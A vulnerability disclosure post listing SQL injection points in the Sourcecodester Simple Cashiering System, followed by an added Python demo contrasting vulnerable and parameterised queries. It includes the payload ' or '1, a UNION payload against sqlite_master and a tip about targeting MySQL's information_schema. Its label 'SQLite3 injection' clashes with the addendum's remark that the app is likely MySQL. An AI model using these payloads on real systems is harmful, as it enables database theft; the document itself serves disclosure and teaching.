Multiple SQL injections in Sourcecodester Simple Cashiering System (POS)

Continuing the hunt on Sourcecodester Simple Cashiering System (POS), I also found multiple SQL injections.

  • Vulnerable URL: http://localhost/cashiering/?page=pos
  • Affected field: Product Code
  • Payload:  ' or '1

Submitting this payload lists every product in the database.


  • Vulnerable URL: http://localhost/cashiering/manage_products.php?id=1
  • Affected field: id
  • Payload: some SQLite3 injection

This one does not require authentication.

  • Vulnerable URL: POST http://localhost/cashiering/actions.php?a=searh_prod
  • Affected parameter: t
  • Payload: some SQLite3 injection


All of these bugs allow an attacker to dump the entire contents of the database.
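Added example, not code from this post or from the POS application: a Python script that reproduces the flawed query pattern against a constructed in-memory SQLite table, so you can see why `' or '1` in the Product Code field returns every row, how the same hole is widened with a UNION to read other tables (which is what "get all the data from the DB" means in practice), and how a parameterised query closes it. The table, its rows, and the function names are assumptions for illustration; the real application is PHP and its schema differs.

```python
import sqlite3

# Constructed sample data standing in for the POS product table.
# This is not the application's schema; it exists only so the example runs offline.
PRODUCTS = [
    ("P001", "Coffee", 2.50),
    ("P002", "Tea", 1.75),
    ("P003", "Sandwich", 5.00),
]


def make_db():
    """Create an in-memory database with the constructed products table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (pcode TEXT, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, pcode):
    """Hypothetical reproduction of the flawed pattern: the product code is
    spliced straight into the SQL text, so quotes in the input rewrite the query."""
    sql = "SELECT pcode, name, price FROM products WHERE pcode = '" + pcode + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, pcode):
    """Hardened form: the product code is bound as a parameter and is never
    parsed as SQL, so the same payloads simply match no product."""
    sql = "SELECT pcode, name, price FROM products WHERE pcode = ?"
    return conn.execute(sql, (pcode,)).fetchall()


if __name__ == "__main__":
    db = make_db()

    # The post's payload. The query becomes  WHERE pcode = '' or '1'
    # and SQLite treats the string '1' as true, so every row comes back.
    print("vulnerable, ' or '1 :", lookup_vulnerable(db, "' or '1"))

    # Widening the hole: a UNION against sqlite_master reads the schema
    # of every table, which is the first step toward dumping the whole DB.
    # The trailing comment swallows the closing quote the code appends.
    union = "' UNION SELECT name, sql, 1 FROM sqlite_master --"
    print("vulnerable, UNION     :", lookup_vulnerable(db, union))

    # The parameterised version returns nothing for both payloads
    # and still works for a legitimate code.
    print("safe, ' or '1         :", lookup_safe(db, "' or '1"))
    print("safe, P002            :", lookup_safe(db, "P002"))
```

The UNION branch only works because the injected column count matches the original three; in a real engagement you would discover that count first, and against MySQL (which this PHP app most likely uses) you would read `information_schema.tables` instead of `sqlite_master`.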
